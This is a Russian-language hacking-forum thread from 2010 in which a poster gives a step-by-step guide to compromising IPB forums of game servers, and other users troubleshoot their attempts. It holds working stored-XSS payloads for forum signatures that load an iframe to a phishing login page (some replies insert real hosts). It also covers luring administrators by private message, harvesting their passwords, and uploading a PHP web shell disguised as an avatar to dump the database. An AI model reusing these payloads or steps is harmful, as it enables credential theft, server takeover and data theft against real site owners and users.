Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация

Взлом БД через форум с xss

-

Базы серверов и брут

- Все, что связано с брутом и работой с базами данных

Закрытая тема
 
Опции темы
Старый 03.06.2010, 09:38   #1
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Взлом БД через форум с xss

Это оригинальная тема, другие темы выложеные на других сайтах тупой копипаст

Данный баг долго лежал в подполье, решил выложить и выслушать ваши вопросы связанные с данным багам.
Прежде чем спрашивать прочитайте все до конца.


Для начала давайте разберемся что нам это даст?
1)Стать админом а больше ничего и ненадо)


Вообщем я нашёл способ взлома сайта а там и бд, через форум ipb с применением xss.

Что такое xss?

Код:
XSS (англ. Сross Site Sсriрting — «межсайтовый скриптинг») — тип уязвимости интерактивных информационных систем в вебе. XSS возникает, когда в генерируемые сервером страницы по какой-то причине попадают пользовательские скрипты. Специфика подобных атак заключается в том, что вместо непосредственной атаки сервера они используют уязвимый сервер в качестве средства атаки на клиента.
Иногда для термина используют сокращение «CSS», но чтобы не было путаницы с каскадными таблицами стилей, используют сокращение «XSS».Сейчас XSS составляют около 15 % всех обнаруженных уязвимостей[1]. Долгое время программисты не уделяли им должного внимания, считая их неопасными. Однако это мнение ошибочно: на странице или в HTTP-Cookie могут быть весьма уязвимые данные (например, идентификатор сессии администратора). На популярном сайте скрипт может устроить DoS-атакy.
Работает везде где имееться тег acronym в ipb

Пример популярных серверов: [Ссылки могут видеть только зарегистрированные пользователи. ] (уже не актуально)

XSS работал бы и на шоках но там слишком длиные сообщения запрещены(в подписи) а в сообщение эти теги отключены.

Создаем фейк.

Как Создать?Жми сюда!
Фейк мы приготовили. Пример: [Ссылки могут видеть только зарегистрированные пользователи. ]
Теперь нам нужно приготовть xss.

Код xss выглядит таким образом:
1) Для ie & firefox
Код:
[acronym=test1[acronym=test2 onmouseover= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://mail.ru\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]_]___________________________________________________________________________[/acronym]_[/acronym][/size][/color]
2) Для opera:
Код:
[acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://mail.ru\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]
Пример с оперой [Ссылки могут видеть только зарегистрированные пользователи. ]

Вместо [Ссылки могут видеть только зарегистрированные пользователи. ] вам нужно вставить свою ссылку на фейк. И у вас должно получиться что то вроде этого:


Код:
[acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://l2fan-day.ru.freehostia.com/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]
Чтобы небыло видно лучше всего скрыть цветом.

Код мы приготовили теперь нужно его вставить в подпись, для этого идем в кабинет, переходим в подпись и вставляем код.

Теперь нужно поймать админа, для этого пишем ему в ЛС что либо про донат и т.д. и т.п.

Код работает таким образом. Когда админ переходит на ваше лс (личное сообщение) открывается ваш фейк с адресом форума (Оо). То есть админ не впалит вас что это фейк а подумает что нить про куки и т.п.
Когда же админ зайдет снова в ваше ЛС фейк больше НЕ ОТКРОЕТЬСЯ ^^, при переходе на фейк он получит куки в виде ibp_my=1234 и пока есть этот кук переадресовывать на фейк не будет. Но как же сделать чтобы куки стерались через 24 часа?

setTime(getTime()+30*24*60*60*1000)
Красным выделено количество дней, в течение которых кука будет храниться в браузере юзера.(Вам нужно изменить это в коде)

Вот админ прочитал наш лс мы получили его пасс. Что делать дальше?А дальше мы идем в админку [Ссылки могут видеть только зарегистрированные пользователи. ]
Есть несколько способов залить шелл:
1) Через аватар
2) Через sql
3) Через настройки форума

Первый наиболее легки поэтому я вам про него расскажу.
В админке идем Форумы->Прикрепляемые файлы->Типы файлов
жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да. Топаем в свой профиль:

[Ссылки могут видеть только зарегистрированные пользователи. ]

грузим аву-шелл с расширением php3, смотрим адрес вашего аватара переходим по нему и получаем шелл.

Далее залазим в самый корень и ищем config файл с логин и пассом от мускула, ну а дальше подключаемся сливаем бд и т.д.


Таким образом мной было взломано очень много серверов, первой жертвой как вы уже догадались был сервер l2fan-day.ru.

Хочешь знать как фиксануть данную багу? ЖМИ СЮДА!

Все вопросы только в эту тему, именно для этого я её создал! В icq не писать, всё равно не отвечу.

Удачи!

Уже появились первые вопросы.


FAQ:

Вопрос: Так получается админ еще должен в фейк ввести логин пасс свой?Так он не глупый не введет.
Ответ: Адрес будет [Ссылки могут видеть только зарегистрированные пользователи. ] форум.com/index.php?act=Msg&CODE=01 а страница фейковая, т.е. адрес не поменяется

Вопрос: Так значит название домена не повлияет?
Ответ: Не повлияет

Вопрос: чтобы и на ИЕ и на Оперу фейк переадресовывал можно в подписи оба кода вставить?
Ответ: Да
Вопрос: Почему у меня в фейке не отображаються картинки?
Ответ: Прочитай статью занова и внимательно!

Вопрос: Где смотреть пароли? or вопрос,а где будет пароль админа?
Ответ: В файле txt (pass.txt и т.д. и т.п.)

Вопрос: Какой хостинг выбрал ты?
Ответ: [Ссылки могут видеть только зарегистрированные пользователи. ] но для этого вам придеться и зарегать почту на fromru.com или gmail.com, ещё хостинги: 1gb.ru, hum.ru

Вопрос: Как поменять сообщение под цвет форума?
Ответ: Используй bb код [*COLOR="цвет"][/COLOR*] (без *)

Вопрос: Создал фейк но при вводе логина и пасса выходит вот такая ошибка:
Код:
Warning: Unknown: open_basedir restriction in effect. File(/home/vov/l/2/t/l2toy/public_html/login.php) is not within the allowed path(s): (/nonexistent) in Unknown on line 0

Warning: Unknown: failed to open stream: Operation not permitted in Unknown on line 0

Fatal error: Unknown: Failed opening required '/home/vov/l/2/t/l2toy/public_html/login.php' (include_path='.:/usr/local/share/pear') in Unknown on line 0
Ответ: Меняй хостинг либо ставь права чмод 777

Вопрос: Где найти такие форумы?
Ответ: [Ссылки могут видеть только зарегистрированные пользователи. ]

Вопрос: Программа создала фейк но там не понятна кодировка, всякие квадратики и т.д
Ответ:В программе, внизу где 'Дополнительная замена строк'
Введите в поле 'C' => charset=utf-8
Введите в поле 'На' => charset=windows-1251

Вопрос:Как можно небольшие белые полоски сверху и сбоку убрать
Ответ:В коде вместо x20width=100%\x20height=100% вставь x20width=1024\x20height=768

Вопрос:как сделать так, чтобы прокрутка (скрол) была только вертикальная?
Ответ:никак

Вопрос: Какой шелл лучше всего юзать?
Ответ: Я вам предлагаю [Ссылки могут видеть только зарегистрированные пользователи. ] после залития попросит пароль введите root

Вопрос: ты сможешь ламануть для меня ?
Ответ нет это меня до смерти надоело)


На таких скинах как [Ссылки могут видеть только зарегистрированные пользователи. ] [Ссылки могут видеть только зарегистрированные пользователи. ] [Ссылки могут видеть только зарегистрированные пользователи. ] asterios и т.д. непашет


ПРОШУ ВНИМАНИЯ!
В коде где x3C****** поменяйте на x3Cifr*ame (без*) везде , т.к. форум жрет этот кусок кода!


Видео по созданию фейка.
[Ссылки могут видеть только зарегистрированные пользователи. ]
Пасс: zhyk.ru
Спасибо пиквику)

P.S. Отдельное спасибо LeverOne


При копировании указывать источник обязательно! ( Люди не будьте засранцами )
©m0nk

Последний раз редактировалось m0nk; 07.06.2010 в 16:27.
 
43 пользователя(ей) сказали cпасибо:
4uzet (05.06.2010), 4yna4ynC (03.06.2010), Amba (03.06.2010), ATJIaHTuK (03.06.2010), BlackWinG (03.06.2010), BuT9H (03.06.2010), cavern (03.06.2010), CeDou (12.06.2010), Chipito (03.06.2010), ClassID (27.12.2010), DeathAngel (31.03.2011), DonKanreole (03.06.2010), ExxtanzO (03.06.2010), f1z1k (02.07.2010), figflex12 (04.06.2010), fireridlle (03.06.2010), Fix (03.06.2010), Flyday (03.06.2010), Funcky (06.06.2010), H0oL1GaN (08.06.2010), Подозреваемый (23.01.2013), IncubusX (03.06.2010), Jumper (03.06.2010), Lev (03.06.2010), Logan22 (22.04.2012), mangos (04.06.2010), Mitsubi (04.06.2010), n1cekkk (27.06.2011), necros555 (05.06.2010), object (04.06.2010), ProTocoL (29.06.2010), PrOveN (13.04.2011), S&M (03.06.2010), samyrai5 (03.06.2010), Skilled (03.06.2010), smertoO (03.06.2010), Sorceres (03.06.2010), Spiritizm (29.01.2011), TakeThat (03.06.2010), talala (03.06.2010), wantedboy (04.06.2010), xRedBullkax (12.06.2010), [Tiger] (03.06.2010)
Старый 03.06.2010, 09:52   #2
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

[Ссылки могут видеть только зарегистрированные пользователи. ]

На l2top.ru ты найдешь кучу таких форумов
 
Старый 03.06.2010, 11:19   #3
 Пехотинец
Аватар для BuT9H
 
BuT9H скоро будет известенBuT9H скоро будет известенBuT9H скоро будет известен
Регистрация: 25.11.2009
Сообщений: 71
Популярность: 232
Сказал(а) спасибо: 78
Поблагодарили 23 раз(а) в 16 сообщениях
Отправить сообщение для BuT9H с помощью ICQ Отправить сообщение для BuT9H с помощью Telegram Отправить сообщение для BuT9H с помощью Yahoo Отправить сообщение для BuT9H с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

создал фейк ввожу туда логин пасс потом не переадресовывает а выходит ошибка и данные не записываются в текстовик на хостинге...что делать?
________________
Не говори мне что делать, и я не скажу куда тебе идти
 
Старый 03.06.2010, 12:17   #4
 Разведчик
Аватар для xRedBullkax
 
xRedBullkax на правильном путиxRedBullkax на правильном пути
Регистрация: 18.04.2010
Сообщений: 31
Популярность: 114
Сказал(а) спасибо: 92
Поблагодарили 52 раз(а) в 36 сообщениях
Отправить сообщение для xRedBullkax с помощью ICQ Отправить сообщение для xRedBullkax с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

как проверить что фикса нету?
я скрипт вставил,подпись изменил,и пишет типо ваша текущая подпись '>
 
Старый 03.06.2010, 12:18   #5
Заблокирован
 Сержант
Аватар для Rea1
 
Rea1 скоро будет известенRea1 скоро будет известенRea1 скоро будет известенRea1 скоро будет известенRea1 скоро будет известен
Регистрация: 19.03.2010
Сообщений: 108
Популярность: 466
Сказал(а) спасибо: 45
Поблагодарили 227 раз(а) в 125 сообщениях
Отправить сообщение для Rea1 с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Сори за нубство)
Код:
[acronym=[acronym= style=background:url('//') onerror= 

lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.coo

kie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://finalarena.com.wallst.ru/

/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); 

]][/acronym][/acronym]
правельная подпись или я чёт нето написал?)
 
2 пользователя(ей) сказали cпасибо:
DarkRider (06.06.2010), KillerTT (01.07.2010)
Старый 03.06.2010, 12:36   #6
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от xRedBullkaxПосмотреть сообщение
как проверить что фикса нету?
я скрипт вставил,подпись изменил,и пишет типо ваша текущая подпись '>

так и должно быть, скрой это под цвет форума


Цитата:
Сообщение от Rea1Посмотреть сообщение
Сори за нубство)
Код:
[acronym=[acronym= style=background:url('//') onerror= 

lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.coo

kie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://finalarena.com.wallst.ru/

/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); 

]][/acronym][/acronym]
правельная подпись или я чёт нето написал?)

1) ты зачем ****** поменял на * ?
2) [Ссылки могут видеть только зарегистрированные пользователи. ] нет такого сайта
3) Будет вот так:
Код:
[acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://finalarena.com.wallst.ru/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]
Добавлено через 17 минут
ПРОШУ ВНИМАНИЯ!
В коде где x3C****** поменяйте на x3Cifr*ame (без*) , т.к. форум жрет этот кусок кода!

Последний раз редактировалось m0nk; 03.06.2010 в 12:55. Причина: Добавлено сообщение
 
Старый 03.06.2010, 14:16   #7
 Разведчик
Аватар для fireridlle
 
fireridlle никому не известный тип
Регистрация: 05.04.2010
Сообщений: 25
Популярность: 16
Сказал(а) спасибо: 29
Поблагодарили 3 раз(а) в 3 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

программа сделал фейк не с тем оформлением.
вот оригинал [Ссылки могут видеть только зарегистрированные пользователи. ]
вот фейк [Ссылки могут видеть только зарегистрированные пользователи. ]
 
Старый 03.06.2010, 17:01   #8
-= Чит-Воин =-
 Пехотинец
Аватар для cavern
 
cavern душа компанииcavern душа компанииcavern душа компанииcavern душа компанииcavern душа компанииcavern душа компанииcavern душа компанииcavern душа компании
Регистрация: 21.11.2009
Сообщений: 77
Популярность: 1063
Сказал(а) спасибо: 13
Поблагодарили 100 раз(а) в 36 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

вот шелл wso2 [Ссылки могут видеть только зарегистрированные пользователи. ]
на форумах такого типа у кого-нибудь работает? [Ссылки могут видеть только зарегистрированные пользователи. ]
 
Старый 03.06.2010, 18:02   #9
Заблокирован
 Пехотинец
Аватар для Sorceres
 
Sorceres на правильном путиSorceres на правильном пути
Регистрация: 28.10.2009
Сообщений: 61
Популярность: 157
Сказал(а) спасибо: 91
Поблагодарили 84 раз(а) в 32 сообщениях
Отправить сообщение для Sorceres с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Возникает такая трабла при создании фейка..
Атрибуты 777
Страница ввода логина работает,а когда жмёшь войти такая вот ошибка(1 скрин)

2 скрин что у меня в login.php
 
Старый 03.06.2010, 18:06   #10
 Разведчик
Аватар для IceMix
 
IceMix на правильном пути
Регистрация: 11.02.2010
Сообщений: 13
Популярность: 46
Сказал(а) спасибо: 33
Поблагодарили 18 раз(а) в 7 сообщениях
Отправить сообщение для IceMix с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

Ребят поскажите как зделать права 777 ???

Хостинг wallst.ru
________________
Помог?)Тыкни Ice кнопку "Спасибо"
 
Старый 03.06.2010, 18:07   #11
Заблокирован
 Сержант
Аватар для Rea1
 
Rea1 скоро будет известенRea1 скоро будет известенRea1 скоро будет известенRea1 скоро будет известенRea1 скоро будет известен
Регистрация: 19.03.2010
Сообщений: 108
Популярность: 466
Сказал(а) спасибо: 45
Поблагодарили 227 раз(а) в 125 сообщениях
Отправить сообщение для Rea1 с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Выдели пожалуйста строку где ставить пробел...
 
Старый 03.06.2010, 18:21   #12
 Разведчик
Аватар для fireridlle
 
fireridlle никому не известный тип
Регистрация: 05.04.2010
Сообщений: 25
Популярность: 16
Сказал(а) спасибо: 29
Поблагодарили 3 раз(а) в 3 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

сайт la2real.net/forum
в подписе пишу
Код:
[acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://freya.wallst.ru/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]
ошибка
[Ссылки могут видеть только зарегистрированные пользователи. ]
 
Старый 03.06.2010, 18:42   #13
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от SorceresПосмотреть сообщение
Возникает такая трабла при создании фейка..
Атрибуты 777
Страница ввода логина работает,а когда жмёшь войти такая вот ошибка(1 скрин)

2 скрин что у меня в login.php

меняй хостинг, валст неподходит
 
Старый 03.06.2010, 18:43   #14
 Разведчик
Аватар для fireridlle
 
fireridlle никому не известный тип
Регистрация: 05.04.2010
Сообщений: 25
Популярность: 16
Сказал(а) спасибо: 29
Поблагодарили 3 раз(а) в 3 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

а можно сделать чтоб переход побыстрей проходил. а то я сначало смотрю свой профиль и где то через секунд 5 меня перенаправляет на мой фейк

Добавлено через 1 минуту
Цитата:
Сообщение от m0nkПосмотреть сообщение
меняй хостинг, валст неподходит

подходит
вот у меня стоит [Ссылки могут видеть только зарегистрированные пользователи. ]

Последний раз редактировалось fireridlle; 03.06.2010 в 18:44. Причина: Добавлено сообщение
 
Старый 03.06.2010, 19:45   #15
 Разведчик
Аватар для fireridlle
 
fireridlle никому не известный тип
Регистрация: 05.04.2010
Сообщений: 25
Популярность: 16
Сказал(а) спасибо: 29
Поблагодарили 3 раз(а) в 3 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

поставь права 777 на файл pass.txt(или как он у тебя называется).
дай сылку на фейк. лог и пас от админки. посмотрю что у тебя там
 
Закрытая тема

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом сервера через PHP Silence Треп 1 27.09.2010 20:41
Кража аккаунтов через форум (скрипт php) Razzor Подполье Lineage 2 (0 уровень) 1 01.08.2009 00:21

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 14:45.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net